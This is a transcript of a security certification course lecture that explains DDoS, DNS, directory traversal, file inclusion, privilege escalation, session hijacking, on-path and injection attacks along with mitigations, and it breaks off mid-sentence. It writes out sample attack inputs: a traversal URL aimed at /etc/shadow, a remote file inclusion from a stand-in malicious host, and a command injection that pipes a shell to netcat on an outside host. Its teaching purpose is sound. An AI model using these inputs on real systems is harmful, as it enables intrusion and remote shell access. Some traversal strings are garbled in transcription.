In this section of the course, we're going to be covering malicious activity. Now, in the digital age, the threat landscape is constantly evolving, with new forms of malicious activity emerging at an alarming rate. Cyber attacks are a subset of these activities, and they become a huge concern for individuals, businesses, and governments alike. These attacks are not only increasing in frequency, but they're also increasing in sophistication, and this makes them quite a challenge to us as cybersecurity professionals. Now, in this section of the course, we're going to be diving into the diverse world of cyber attacks and shedding some light on the various types, mechanisms, and impacts that they have. We're going to explore the breadth and depth of malicious activities that lurk in the cyber realm. Now, it's important for you to understand these cyber threats because it really is the first step towards effective prevention and mitigation for you as a cybersecurity professional. Now, by gaining insights into the tactics, techniques, and procedures employed by these cyber criminals, we as cyber defenders can better equip ourselves to protect our networks against these invisible yet potent threats. So, in this section of the course, we're going to be focused on Domain 2 and specifically on Objective 2.4. The Objective 2.4 states that given a scenario, you must be able to analyze indicators of malicious activity. First, we'll be discussing distributed denial of service attacks known as DDoS attacks. As we go through this lesson, we'll be covering all the different variants of a denial of service attack, including denial of service, amplified distributed denial of service attacks, reflected distributed denial of service attacks, and the ways that we can avoid or stop these types of attacks from occurring. Then, we'll be jumping into a discussion on domain name server attacks known as DNS attacks, and this includes DNS cache poisoning, DNS amplification attacks, DNS tunneling, domain hijacking, and DNS zone transfer attacks. After that, we'll be talking about directory traversal attacks. Now, a directory traversal attack, also known as a path traversal, involves exploiting insufficient security validation or sanitization of user-supplied input file names. Next, we'll be discussing privilege escalation attacks. Now, a privilege escalation attack is a type of network intrusion that involves exploiting a system vulnerability to gain elevated access to resources that are normally protected from an application or user. Then, we'll be discussing replay attacks. Now, replay attacks involve the malicious or fraudulent repeat or delay of a valid data transmission. In this type of an attacker intercepts a data transmission and then retransmits it. After that, we're going to be looking at session hijacking. Now, session hijacking, also known as session sidejacking, cookie hijacking, or session key hijacking, is a type of security attack where a user session is taken over by the attacker. In this type of attack, the attacker can exploit a valid computer session to gain unauthorized access to information or services inside of a computer system. Then, we're going to be diving into malicious code injection attacks. Now, malicious code injection is a broad class of attacks where an attacker can introduce harmful code into a program or system to cause it to behave in an unintended way. After that, we'll be covering indicators of compromise, known as IOCs, and this includes things like account lockouts, concurrent session utilization, blocked content, impossible travel, resource consumption, resource inaccessibility, out-of-cycle logging, published documents that you've been hacked, and missing log files. Finally, we'll take a short quiz to see what you learned during this section of the course, and review each of those quiz questions fully to ensure you can explain why the right answer was right. So, if you're ready, let's hop on into our coverage of malicious activity in this section of the course. In this lesson, we're going to focus on the concept of distributed denial of service attack. Now, a denial of service attack isn't a specific attack in and of itself, but instead is this category or type of attack that's carried out in a number of different ways. Essentially, the term denial of service is used to describe any attack which attempts to make a computer or server's resources unavailable, but it can also be extended to network devices like switches and routers as well. The first category is called a flood attack. This is a specialized type of denial of service which attempts to send more packets to a single server or host than it can handle. So, in this example, we see an attacker sending 12 requests at a time to a server. Now, normally a server wouldn't be overloaded with just 12 requests, but if I could send 1,200 or 12,000, that might allow me to flood that server and take it down. Now, under a flood attack, we have a few different specialized varieties. The first is called a ping flood. This attack is going to happen when somebody attempts to flood your server by sending too many pings. Now, a ping is technically an ICMP echo request packet, but they like to call it a ping on the exam. Because a ping flood has become so commonplace though, many organizations are now simply blocking echo replies and simply having the firewall dropping these requests whenever they're received. This results in the attacker simply getting a request timed out message and the server remains online and the denial of service is stopped. The next flood attack we're going to cover is a SYN flood. Now, this attack is a variant on a denial of service attack where the attacker is going to initiate multiple TCP sessions but never complete the three-way handshake. You can see here how the attacker is sending 4 SYN packets to the server, but they're using made-up IP addresses. The server then replies to those IP addresses in an attempt to establish that three-way handshake, but of course, the other people weren't expecting that call, and so no one responds. This causes the server to set aside resources for these supposed clients while it waits for their response and acknowledgement, but the acknowledgement never comes. If the attacker creates enough requests, the server will simply run out of resources and be unable to establish any real connections with those who really want to do business with the server, and this creates the denial of service condition. To prevent this from occurring, flood guards can be installed in the network. These devices will detect when a SYN flood is being attempted, and they'll block the request at the network boundary, freeing up the server. Flood guards can also be a feature in some routers and firewalls as well. Also, your server can be configured to time out on those half-open requests after a period of time, say 10, 15, or 30 seconds, and this will free up those resources and prevent the denial of service condition from happening too. Intrusion prevention systems also have the ability to detect and respond to SYN floods as they're being attempted. So, now that we've covered the different types of flood attacks, let's move on to our next category, the permanent denial of service attack, or PDoS. This is an attack which exploits a security flaw to permanently break a networking device by reflashing its firmware. This can cause a device to be unable to reboot itself because its operating system is overwritten. It's also called a permanent denial of service attack because a quick reboot won't bring the system back online. Instead, the device has to be taken offline, have a full firmware reload done, and then it can be brought back online. Finally, we have our last one, the fork bomb. With a fork bomb, the attacker creates a large number of processes to use up available processing power of a computer. This attack gets its name because a process is called a fork, and it can be forked into 2 processes and then 4 processes and so on until it eats up all the resources. Now, some people think of this as a worm because of the self-replicating nature, but they're not a worm because they don't infect programs and they don't use the network to spread. Instead, fork bombs only spread out inside the processor's cache on a single computer that it's being attacked with, and it causes a denial of service attack and a denial of service condition, which is why it's considered not to be a worm. Now, there are new denial of service attacks being dreamt up all of the time. Basically, for the exam though, if an attack causes a system to go offline and to stop providing the service that it's really supposed to do to its real users, or it can permanently cause a system to be broken, this could be categorized as a denial of service condition. Now, we discussed the concept of a denial of service attack. We went over all of the different types of them, but most modern systems can't be taken down by a single machine attempting a denial of service anymore. So attackers got smarter, and they created a distributed denial of service, or DDoS. Now, a distributed denial of service attack, instead of using a single attack targeting one server, they use hundreds or even thousands of machines to launch an attack simultaneously against a single server and force it offline to create that denial of service condition. Usually these machines that conduct the attack don't even realize that they're a part of it though. Generally, these machines have become zombies or bots inside a large botnet, and then when they receive that command to attack, they all simultaneously send all their payloads against a single victim. Now, in addition to most basic forms of DDoS attacks, there is one specific type of DDoS attack called a DNS amplification attack that could be performed. This specialized DDoS allows an attacker to generate a high volume of packets that's intended to flood a victim's website by initiating DNS requests from a spoof version of the target's IP address. This causes the DNS servers to respond to that request and send the response back to the server, thinking that it's valid. Because a DNS request uses very little bandwidth to send, but the response usually takes up a lot more bandwidth, this allows the attack to be amplified against the victim server. Also, if this is happening because thousands of simultaneous requests are being made by a bunch of zombies in a botnet on behalf of your victim server, you can easily become overwhelmed with a lot of information and eat up lots of bandwidth pretty quickly, causing that denial of service condition to occur. We talked about a denial of service attack, involving the continual flooding of a victim system with requests for services that causes the system to crash and run out of memory. Now, this usually happens when you're talking about one system attacking one system, but that wasn't enough with modern computers, so we moved up to the distributed denial of service attack, where hundreds or thousands of people target a single server to take it down. Now, in March of 2018, the website GitHub was actually hit by the largest DDoS that we've clocked to date. This is where tens of thousands of unique endpoints conducted a coordinated attack to hit that server with a spike in traffic, and the spike in traffic went up to 1.35 terabits per second. This took the website offline for all of 5 minutes. So you can see how these DDoSes are really hard on a server and can take them down, but not for very long if you can stop them. So your real question probably is, how can you survive one of these attacks? And how can you prevent it from taking down your organization's servers? Well, we have a couple of techniques. The first one is called blackholing or sinkholing. This technique identifies attacking IP addresses and routes all of their traffic to a non-existent server through a null interface. This effectively will stop the attack. Unfortunately, the attackers can move to a new IP and restart the attack all over again, and so this is only a temporary solution. Intrusion prevention systems can also be used to identify and respond to denial of service attacks. This can work for small-scale attacks against your network, but you're not going to have enough processing power to handle a large-scale attack or a big DDoS. Now, one of the most effective methods to utilize is to have an elastic cloud infrastructure. If you've built your infrastructure so that it can scale up when demand increases, you can write out a DDoS attack. Now, the problem with this strategy, though, is that most service providers are going to charge you based on the capacity and resources that you used, so when you scale up, you're going to get a much larger bill from that service provider than you normally were expecting. And you're not getting a return on this investment because this traffic was all wasted. It wasn't generating any revenue for you. So there's actually some specialized cloud providers out there that have taken on this challenge. People like Cloudflare and Alchemy are designed to help you write out these DDoS attacks. They provide web application filtering and content distribution on behalf of your organization. These service providers are focused on ensuring that you have highly robust, highly available networks that can ensure that they can write out these DDoS attacks and these high bandwidth attacks. This is going to also give you additional layered defenses throughout your OSI model. It's going to help provide you additional protections.
In this lesson, we'll focus on domain name system attacks. The domain name system, also known simply as DNS, is a fundamental component of the internet that is responsible for translating human-friendly domain names into IP addresses that computers can understand. However, its critical role also makes it a prime target for cyber attacks. So let's explore some of the various types of DNS attacks, including DNS cache poisoning, DNS amplification attacks, DNS tunneling, domain hijacking, and DNS zone transfer attacks, and some of the mitigation strategies for each of these types of attacks. First, we have DNS cache poisoning. DNS cache poisoning, also known as DNS spoofing, involves corrupting the DNS cache data of a DNS resolver with false information. This leads the resolver to direct traffic to an incorrect IP address set up by the attacker, often to a malicious website. For example, an attacker could poison the DNS cache of a popular online banking website and then cause the bank's users to be redirected to a fake website where their login credentials could be stolen by the attackers. To prevent DNS cache poisoning, you should utilize DNSSEC, or the Domain Name System Security extensions, to add digital signatures to your organization's DNS data to ensure that its authenticity and integrity are confirmed during any DNS lookup. Also, you should implement secure network configurations and firewalls to protect your DNS servers from unauthorized access to prevent DNS cache poisoning from occurring on your systems. Second, we have DNS amplification attack. In a DNS amplification attack, the attacker exploits the DNS resolution process to overwhelm a target system with DNS response traffic. The attacker sends a DNS query with a spoofed IP address of their victim to an open DNS server, which will then send back a large response to the victim's IP address. For example, if an attacker could send a small query to an open DNS server to request a large amount of data like the entire list of hosts in a domain, this will be sent to the victim's IP address, which in turn causes a flood of unwanted traffic, which can appear to look like a DOS attack against the victim's system. One way to mitigate DNS amplification attacks is to limit the size of DNS responses or rate limit any DNS response traffic to mitigate the impact of this type of attack. Third, we have DNS tunneling. DNS tunneling involves using the DNS protocol to encapsulate non-DNS traffic such as HTTP or SSH over port 53 to attempt to bypass the organization's firewall rules in order to conduct command and control or data exfiltration. DNS tunneling is actually a legitimate technique, but is often exploited by attackers for their own malicious purposes. For example, an attacker could use DNS tunneling to bypass a company's firewall and to exfiltrate sensitive organizational data. Since DNS requests are usually allowed to pass through a firewall without inspection, DNS tunneling is quite effective for sneaking data out of a given network. For this reason, it is important that you regularly monitor and analyze your DNS logs for any signs of unusual patterns or behaviors that could indicate DNS tunneling is occurring. Fourth, we have domain hijacking. Domain hijacking, also known as domain theft, involves the changing of the registration of a domain name without the permission of the original domain's registrant. Domain hijacking can lead to loss of control over a website and potential redirection to a malicious website in place of the organization's real website. For example, if an attacker could hijack a popular e-commerce website domain like Amazon.com, it can redirect all of Amazon's traffic to a fake website where a customer's payment information could be stolen. Again, conducting regular updates and ensuring your registration account information is secure is the best defense against domain hijacking. Additionally, you should use domain registry lock services to prevent any unauthorized changes to your domain registrations to prevent domain hijacking from occurring in the first place. Fifth, and finally, we have DNS zone transfer attacks. In a DNS zone transfer attack, the attacker tries to get a copy of the entire DNS zone data, which includes all of the DNS records for a domain, by pretending to be an authorized system making that request. This type of an attack can expose sensitive information about the network's infrastructure of the domain and can be used as reconnaissance for planning future attacks against a given organization. So remember, DNS attacks exploit the domain name system's vulnerabilities to disrupt service, steal information, or redirect a website's traffic. DNS cache poisoning involves corrupting a DNS resolver's cache. DNS amplification attacks uses the DNS resolution process to flood a target with traffic to create a denial of service type of condition. DNS tunneling can be used to bypass firewall rules and to conduct data exfiltration. Domain hijacking involves unauthorized changes to a domain's registration, and the DNS zone transfer attack aims to get a copy of a domain's DNS zone data. By understanding how these attacks are performed, you can easily put mechanisms in place to prevent them from happening.
In this lesson, we're going to talk about directory traversal attacks and the vulnerabilities associated with them. Now, when we talk about a directory traversal attack, this is a type of injection attack. And injection attacks occur when the attacker inserts malicious code through an application interface. Now, the one we're going to talk about specifically here and focus on is directory traversal. Now, a directory traversal is a type of injection attack, and any kind of injection attack really focuses on the ability for the attacker to insert malicious code through an application interface. Now, when we talk about a directory traversal, we're talking about an application attack that allows access to commands and files and directories that may or may not be connected to the web document root directory. Now, if you're running a web server, you're running this on Windows or Mac or Linux or Unix or some kind of operating system. And there's going to be a folder in there that is called the web document root. Essentially, that folder is where, when you go to deontraining.com, it goes to find those files. Now, that isn't the root of your hard drive. It's just the root of that directory. But there's many folders above that. And so if I went to something like deontraining.com ///etc/shadow, that would try to go and find that shadow file. Now, that shadow file isn't inside the web root though. Instead, it's located on some other file off of the directory. And so what we're doing here with that //// is doing a directory traversal. Now, let me show you what this looks like graphically. Essentially, we have something that looks like this. The root is the actual root of your hard drive. So my server happens to be using Linux. And because we're using Linux, we're going to be using that slash. Now that's the root. Underneath that, I have two folders. I have /etc and /home. Now, if I go underneath the home directory, I have /programs. And if I go under that, I have /www root. And under that, that's where my web pages are stored. So the www root, that is my web root directory for those documents. So when somebody tries to go to deontraining.com /////etc/shadow, what are they trying to do? Well, if we start with deontraining.com, that's going to load index.html or index.php from the web pages. That's that blue thing in the bottom right corner. Now when I go .. I go up into the folder above it. And then .. goes again up into the folder above it. .. goes up into the folder above it. .. goes up into the root directory now. And then I go /etc down into the etc folder. And then /shadow, I'm going to try to read that shadow file. That's what they're doing here. That's what a directory traversal is. And so if we can read those files or execute those files by doing this, we can do that from a URL by typing into a browser and remotely attack that system. So we don't want this to happen, right? Now, when we look at these, you're going to see a lot of these .. slashes or .. backslashes. Now, in this case, it's .. because Unix systems like Linux and Mac, they use .. If you're using a Windows system, so you're using IIS as your web server, it's going to use .. because on a Windows system, you have your C drive, C://, and so you're going to be using .. But a lot of times Windows is configured to accept either way, the / or the / and it will accept both. Now, what we want to do with these directory traversals is prevent them from happening. So how can we do that? Now, the problem with these directory traversals, like I said, is that they can be used to access any file on a system if they have the right permissions. So if I configure my server correctly, you're not going to have access as a web user to read my shadow file or my password file. But if I didn't have it correctly, you could access those and read those right from your browser. And so we want to be able to prevent this from happening. Now, one thing I want to warn you about, you're not always just going to see the .. Now, that is the most common way to see it, especially on the exam, to identify a directory traversal. But remember we talked about encoding all the way back earlier in the course? Well, people can use encoding against you as well. Attackers can use encoding to hide their directory traversal attempts. So instead of using .. they might use %2e, %2e, %2f, and that would be .. So keep that in mind as well. Now, another vulnerability we have to talk about when we talk about directory traversals is file inclusion. File inclusion is when a web application vulnerability is being exploited that allows an attacker to either download a file from an arbitrary location on the host file system by using that directory traversal, or upload an executable or script file to open a backdoor. Now, this will come in two different flavors. We have remote file inclusions and local file inclusions. When we talk about a remote file inclusion, This occurs when an attacker tries to execute a script to inject a remote file into the web app or the website. So if I use something like https://deontraining.com/login.php, that part is fine. Then I have a question mark, user equals. This is passing the parameter of which user I want to log in as. Now, what user am I going to log into? Am I going to log in as Jason? No, we're going to log in as http://malware.bad/malicious.php. So what we're doing is we're passing this parameter, and when our system executes and tries to find that parameter to load it into our database, instead, we're going to load in this malicious script. So this is the idea of a remote file inclusion. We're including this remote file, malicious.php, from this other website into my web server using this type of command. Now, another one you can use is what's called local file inclusion. Now, local file inclusions are where an attacker tries to add a file to the web app or website that already exists on the hosting server. So let's say on my website, we might allow you to upload something like a picture or a PDF or other files as part of our community forum. Well, then you could reference that file because it's already sitting on my server. So in this case, you would do something like https://deontraining.com/login.php question mark user equals, and now here you see this directory traversal, //windows/system32/cmd.exe%00. Now, what are they trying to do? This is assuming that I have a Windows server, and they're trying to go up 2 directories into the Windows directory, down into system32, and run the command shell. This way, they can run any program they want that executes in DOS or Windows. Now, what is that %00 at the end? Well, that's a common tactic that's used to insert a null character at the end of your URL. That %00 in URL encoding is essentially a null character, and so this is being used to request to bypass the security mechanisms that would normally add a .php to the end of the request and instead allow us to use that .exe extension. Now, for the exam, let me give you a couple of quick tips. Anytime you see something with .. I want you to think directory traversal. This is what the answer is most likely going to be. Now, the reason for this is because on the exam, they're going to bring up the idea of directory traversal a lot. Now, you might also get some questions about local file inclusions, and if that's the case, that is a type of directory traversal. Now, if you get a question like this on the exam, you're not going to have answer choices A, B, C, and D, where A is directory traversal and B is local file inclusion. They won't do that to you. Instead, you're going to have, on this question, directory traversal. On another one, you might have local file inclusion. So if you see .. it's one of those two things. Now, when you're on the exam, you're going to be asked to look at logs and things like proxy servers. And as you're looking through the proxy server logs, you're going to see these different URLs inside those logs. And as you look at them, anytime you see that .. I want you to remember that is directory traversal. And that'll be the right answer for you on the exam. In this lesson, we're going to talk about the concepts of execution and escalation attacks. Now, when we talk about attacks against software code, usually these attacks are going to attempt to execute some kind of attacker's code within your system. And the way they do that is by exploiting some kind of a vulnerability. Now, when we talk about this section, we're really going to focus on a couple of key areas. We're going to talk about arbitrary code execution, remote code execution, privilege escalation, and rootkits. Now, when we talk about arbitrary code execution, this is a vulnerability that allows an attacker to run their own code or a module that exploits such a vulnerability. Now, essentially, they're able to run what they want on your system without you stopping them. That's what we mean by arbitrary code execution, because they're being able to run the things they want to run, which is against what you want to run, and therefore it's arbitrary. Now, another thing we can look at is what's known as remote code execution. Now, remote code execution is like arbitrary code execution. In fact, it's a type of that. But this is really a vulnerability that allows an attacker to transmit code from a remote host for execution on a target host or a module that exploits such a vulnerability. So if I can touch your machine and load up my software, that's arbitrary code execution. If I can do it over the internet, that's remote code execution. That's the difference between these two. Now, the next thing we want to talk about is privilege escalation. Now, we've mentioned the term privilege escalation earlier when we talked about threat hunting. One of the things bad guys want to do is they want to be able to operate at higher levels of privilege. And that's what privilege escalation is all about. This is going to occur when a user accesses or modifies specific resources that they're not entitled to normally access. So if I'm going to do a privilege escalation, what I'm trying to do is attempt to gain administrator or root level permissions. That's the holy grail for these folks. In fact, if they can get a domain admin, that's even better. Now, when we talk about privilege escalation, we can really break this down into two types of escalation. The first is vertical privilege escalation. This is where somebody goes from a normal user and goes to a higher level. So they're going to go to an admin or a root level. When you hear privilege escalation, this is normally what most people think about. They think about a bad guy getting you to click a link in a spear phishing email, that then runs some kind of arbitrary code. That code then gives them escalated rights to be able to be the admin of that local system. That's a vertical privilege escalation. Now, if we're talking about the second type, this is known as horizontal privilege escalation. This occurs when a user accesses or modifies resources they're not entitled to, but it's generally at the same level. So for example, if I'm on the shared drive and I'm trying to access George's file and I don't have George's permission, that would be horizontal privilege escalation. If I ran some kind of exploit that gave me permissions to run as a different user, such as George, even though he's not an admin or a root, that's why it's considered horizontal. We both have user permissions at the same level, but he has permissions over his stuff, I have permissions over my stuff, so I might need to break into his account to be able to do that. And in that case, that would be a horizontal privilege escalation. Now, why are privileges so important? Well, it's because every application or process has to have some kind of privileges to read and write data and execute those functions. Now, because those applications have permissions to run their functions and be able to execute functions and read and write data, if we're able to break into that application, we can run things as that application as well. So for example, some applications and some system processes run using the system account. And so if I can break into that particular application and put some arbitrary code in there, my code is now being run as system. And this allows me to do some sort of hack or attack against that system. So whenever you're running something and somebody's able to put arbitrary code into it, that arbitrary code is going to take the privileges of whoever was running that program. So if Jason's running that program, it has Jason's permission. If the system was running that program, it has the system permission. If an admin was running that program, they have admin permissions. And so again, this is another way that privilege escalation can occur. Now, the last thing we want to talk about is rootkits. Now, rootkits should be something that you're familiar with from your Security Plus studies, and this is just going to be a review for you. A rootkit is essentially a class of malware that modifies system files, often at the kernel level, to conceal its presence. Now, when we're dealing with a rootkit, this is something that is really scary for a lot of people. Why? Because when a rootkit gets into that system, it can hide itself. They are very hard to detect. Now, a lot of times, once you have a rootkit installed, this means the attacker can now hide themselves in your system. They can install other software like malware. They can create persistence between your computers, even if you start rebooting it or shutting it down. They can even maintain persistence between user logoff events and other things like this. Now, when you're dealing with rootkits, you have to understand what are we talking about, because there are different types of rootkits. Now, before we can get into the different types, though, we really have to talk about the idea of rings and the way that systems are built. When we're dealing with a computer, there are multiple rings going from the most privileged to the least privileged. The ring 0 is the center of the computer. This is the kernel. This is where the heart of the operating system lies. And this kernel can be a Windows kernel or a Linux kernel. If you're operating something with kernel level permissions, you're at ring 0. You have the most privileged access to this machine. And so if I can get a rootkit that embeds itself into the kernel, that means I have ring 0 access. Now, if I have some kind of rootkit that attaches itself to a device driver, that might be ring 1 or ring 2. If it's going after an application, it might be ring 3. And the further out you are, the less privileges you're going to have. So let's go back and look at our rootkits. What are the two types we have? Well, we have kernel mode and user mode. When we have a kernel mode rootkit, this is one that's at that ring 0. It's at the center. It has the most permissions. And so a kernel mode rootkit is able to gain complete control over your system. Now, if somebody couldn't get a kernel mode rootkit installed, they can only get a user one installed. This would be a user mode rootkit. And these might have administrator level privileges, but they're using the operating system features for persistence. So they have to be inside the registry. They have to be inside something like Task Scheduler. So that way, when you reboot the system, they get that persistence back. So which one's more dangerous? A kernel mode rootkit, because it's all the way down in ring 0. And therefore, that's going to be more dangerous for our systems.
In this lesson, we're going to cover replay attacks. Replay attacks are a type of network-based attack where valid data transmissions are maliciously or fraudulently rebroadcasted, repeated, or delayed. This type of attack can be likened to a session hijack, but with a slight difference. In a session hijack, the attacker aims to modify the information being sent and received in real time. However, in a replay attack, the attacker's goal is to intercept the data, analyze it, and decide whether or not to retransmit it later. To better understand replay attacks, consider the following example. Let's pretend that an attacker is able to capture the session that occurs when you log into your bank with your username and password. Now, they could then replay that session to the bank at a later time and attempt to log in as you. This is the basic premise of a replay attack, and then reuses them to gain unauthorized access to the system. For example, if you just logged into an online shopping website, but the attacker was able to capture your login session details like your username and password, that attacker could then use these captured credentials to log into your account anytime they want. And then they can make unauthorized purchases as if they were you, or even change the account's password to effectively lock you out of your own account and try to take over your account fully. To combat replay attacks, it's crucial to ensure that the websites and devices use session tokens to uniquely identify when the authentication session is occurring. Session tokens are unique pieces of data that are generated for each session, and these tokens make it difficult for an attacker to replay a session. Multi-factor authentication can also prevent the attacker from capturing and replaying a login session, since the attacker would not have the additional piece of information required for authentication, such as one-time use passwords that change every 30 to 60 seconds on your smartphone's authenticated app. By using multi-factor authentication, it becomes nearly impossible for an attacker to capture and replay a session in order to gain access to your account. To minimize the risk of such attacks, it is highly recommended that you use the latest security protocols like Wi-Fi Protected Access 3, known more commonly as WPA3, in order to avoid the threat of a replay attack. So remember, replay attacks involve the fraudulent or malicious rebroadcasting, repetition, or delay of valid data transmissions. Credential replay attacks specifically target a user's login credentials to gain unauthorized access to the system. Mitigation strategies include the use of session tokens and multi-factor authentication. Your understanding and awareness of these kinds of replay attacks is an important step towards securing your data and protecting yourself from potential cyber threats.
Session hijacking. In this lesson, we are going to talk all about session hijacking. But before we do, we need to talk about session management, because session management is a fundamental security component in our web applications these days. When we talk about session management, this enables web applications to uniquely identify a user across a number of different actions and requests while keeping the state of the data generated by that user and ensuring it's assigned to that user. Now, when we do session management, for instance, you log into my website, and there's a lot of other students who are logged into my website right now. When you're logged in, I need to know what lesson you're watching. I need to know what quiz you've passed. And all of that is session information while you're connected to me. And then when you're done with that session, I need to save that in my database, so that way when you log in next time, we didn't lose your results. Now, a lot of the way that people do this, though, is not just in the database, but they also use cookies. We're talking about cookies in the cyber sense. And the reason we have to use cookies is because web, or HTTP, is a stateless protocol. This means that the server doesn't preserve any information about the client by default. So if you want to store that information, you have to either store it in a cookie or in your database. Now, cookies allow web applications to retain this information about the users of the website. And normally, these cookies are going to be stored on your client. Now, a cookie is essentially just a text file. It's a text file that's used to store information about a user when they visit the website. Now, that cookie is created when the server first sends the HTTP response header with that cookie. Then, any subsequent request headers that are sent by the client will also include the cookie, so we can send that information back and forth. Because of that, we want to make sure that that cookie is protected because it is being transmitted across the internet. Now, when we talk about session cookies like these are going to be non-persistent. They reside in memory. And when you're done and you close out that browser instance, guess what? That cookie would be deleted as well. But not all cookies are just session cookies. Some cookies are going to be more persistent, and these are known as persistent cookies because they stay around for a while. These cookies are stored in the browser cache until they're deleted by the user when you do the clearing your cookies, or when they pass a defined expiration date. For instance, you might connect to my website, and my cookie might say, this cookie is good for 7 days. And so if you came back in 8 days, that cookie would be gone, and you'd be like a new user to us, if we were configured that way. That's the way cookies work. Now, when we talk about cookies, again, they have to be protected. And so when you're sending these cookies or you're storing any kind of confidential information in them, you should make sure they are encrypted. By encrypting those cookies, you can keep that information confidential because remember, confidentiality and encryption go hand in hand. Now, the next thing we need to talk about is session hijacking. As I said, a lot of these cookies are session cookies. And so session hijacking relates to this really well. When we talk about session hijacking, it's a type of spoofing attack where the attacker disconnects a host and then replaces it with his or her own machine, spoofing the original host IP address or using some other mechanism. For instance, a lot of session hijacking attacks occur through the theft or the modification of cookies. So if I can steal your cookie, I can take over your session and pretend I'm you. Now, another way that this can be done is by doing session prediction. Session prediction attacks are simply a type of spoofing attack where the attacker attempts to predict the session token to hijack that session. Now, the session token has to be generated using a non-predictable algorithm, and it must not reveal any information about the session client. Essentially, it's a one-time use ticket for the duration of that session, and so it might be some long random number, but how it's generated has to be non-predictable. If it is predictable, somebody can guess it and they can take over your session. So the last thing I want to talk about here is cookie poisoning. I know we've talked a lot about cookies and it's making me hungry, but let's talk about cookie poisoning and then we'll finish up this lesson. When we talk about cookie poisoning, this modifies the contents of a cookie after it's been generated and sent by the web service to the client's browser, so that that newly modified cookie can then be used to exploit vulnerabilities in a web application. If you want to be able to counter cookie poisoning on your systems, you want to make sure you validate the input of your web app to account for any tampered with cookies. By doing encryption of your cookies during transmission and storage, you can help prevent this, and if you delete cookies from the browser cache when the client terminates their session, it doesn't leave those cookies sitting there being able to be poisoned by somebody else. So this is all about good cookie management. Now, I know a lot of people are against cookies in websites, and a lot of people turn off cookies, but a lot of sites need these cookies to operate. And so you have to be able to think about this if you're the guy or gal who's programming these websites. Do you have to use cookies to do this? Can you do this as saving things in your own database? Can you do this another way? And if you can't and you have to use cookies, make sure you're doing it securely by making sure they're very time limited, they're deleted when you're done, and they're encrypted anytime you're storing data in them. In this lesson, we're going to very briefly cover the concept of an on-path attack. Now, an on-path attack is an attack where the penetration tester is able to put their workstation logically between two hosts during the communication in order to transparently capture, monitor, and relay the communications between those hosts. By placing themselves in the path between the client and the server, the attacker can intercept the authorization packets being sent and received, and then use those to take over the authorized session between the client and the server. Now, there are many different ways of conducting an on-path or interception attack, including ARP poisoning, DNS poisoning, introducing a rogue wireless access point, or introducing a rogue hub or switch. Once an on-path or interception attack has begun, you can then decide to replay or relay the attack. Replay of the data occurs when valid data is captured by the attacker and is then repeated immediately, or is delayed and then repeated. Replay is a common technique in wireless network attacks, but it can also be used in wired networks too. For example, if we can capture an authentication handshake between two hosts, we can then replay it to the authentication server so that it will think we are an authenticated client too and give us access to the network or its resources. Relay, on the other hand, occurs when an attacker is able to become a part of the conversation by inserting themselves in between the two hosts. In this case, the attacker essentially becomes a proxy between two hosts, and they can read or modify any communications between them. When this occurs, anytime the client tries to get to the server, it is instead going from the client to the attacker and from the attacker to the server. From this position, we can capture everything that's being sent between them, including the usernames, passwords, and even bank balances. We can even change the data if we so desire. Remember, relay involves getting the information and then passing it on, or you can intercept it, change it, and then pass it on. The big challenge, though, with replay and relay occurs when encryption is enforced by the host. If the server, for example, is using a strong encryption scheme, like TLS 1.3, it's going to be very difficult or even impossible for us to intercept and crack the communication between these two hosts. To try and overcome this encryption, a technique known as SSL stripping was created. Since a lot of websites use SSL and TLS as a way to encrypt data between the client and the server, we can attempt to attack this by tricking the encryption application into presenting the user with an HTTP connection instead of an HTTPS connection. For instance, let's say you go to facebook.com using HTTPS, but an attacker was able to redirect or downgrade the request to use the regular HTTP connection instead. This would be considered SSL stripping, because now there is no encryption being used in that connection, and we can then capture all the data and read it. Now, if SSL stripping isn't possible, then we can attempt to perform a downgrade attack instead. In a downgrade attack, the attacker attempts to have a client or server abandon its higher security mode in favor of a lower security mode. For example, if the client tries to connect to a server and negotiate a higher level encryption like TLS 1.2 or 1.3, but they're connected through an intermediary attacker who's in an on-path position, that attacker may allow encryption to occur, so they'll see that little lock in their web browser, but only at a lower level, such as using SSL 2.0, which is much easier for the attacker to crack. So that way the attacker can remain in the middle of the communications between the client and server and see everything that's going on. Now, it's important to mention that downgrade attacks don't only affect SSL and TLS though. It can actually be used with any kind of encryption or protection, such as Wi-Fi, VPNs, and others. Anytime we have a client negotiate to a lower level of security that is still technically backwards compatible with that higher level, this is considered a downgrade attack. In this lesson, we're going to discuss some common injection attacks, including LDAP injections, command injections, and process injections. First, we have LDAP injections. LDAP, or the Lightweight Directory Access Protocol, is an open, vendor-neutral, industry-standard application protocol for accessing and maintaining distributed directory information services over an Internet Protocol network. LDAP is often used for authentication and storing information about users, groups, and applications. An LDAP injection is an application attack that targets web-based applications by fabricating LDAP statements that are typically created by user input. For example, if a web application uses LDAP as part of the user login process, an attacker could perform an LDAP injection to search for the users on that server by injecting queries into the LDAP search, similar to how an attacker inserts malicious queries into an SQL injection. For example, if the backend code for the server used the following code, string LDAP search equals cn equals search name, system out println LDAP search, this could actually allow an attacker to simply enter a wildcard character of star into the username field, and that would then be inserted as the search parameter and display all of your users on the system to your screen. To protect yourself against an LDAP injection attack, you should always use input validation and input sanitization, just like we do to protect ourselves from an SQL injection or an XML injection. Second, we have a command injection. Now, a command injection occurs when a threat actor is able to execute arbitrary shell commands on a host via a vulnerable web application. For example, if you have a web application that allows a user to test the connectivity with a remote website or server by simply entering in the IP address or hostname, and then on the back end, you're going to use the ping command, this could be subject to a command injection by simply appending a command to the app. For example, your application in this website might have a form that's going to allow you to enter an IP address, and the web application then takes that input and adds it to the ping command to execute it on your server. So, if I enter diontraining.com and hit the button, it's going to send that over and become ping diontraining.com. But if instead I decide to enter diontraining.com and hostname into that field, this will create a command of ping diontraining.com and hostname that's going to be executed by the server shell. This would then return the result of the ping command and then display the hostname of that server. If I want to make this a little bit more malicious, I can instead use something like diontraining.com and /bin/sh pipe nc hack.diontraining.com 443. This would then ping diontraining.com and then move to the second command, which is starting up a shell and redirecting it over to netcat to a listener that I have set up at hack.diontraining.com over port 443. This would essentially give me full interactive access to this web server by running the simple command injection against that vulnerable server. As you probably guessed, just like SQL injections, XML injections, and LDAP injections, you can also prevent command injections by conducting proper input validation on input received from any of your users. In the case of this web application, we should only accept IP addresses or domain name as input, and we should only allow those to be pinged using this application, and anything after the .com or the final octet should just be ignored or it's not sent over to that ping command. Third, we have process injections. Now, process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system, or network resources, and possibly even elevated privileges. Execution via process injection may also evade detection from security products because execution is masked under a legitimate process. Now, there are many different ways to inject code into a process. Many of these will abuse legitimate 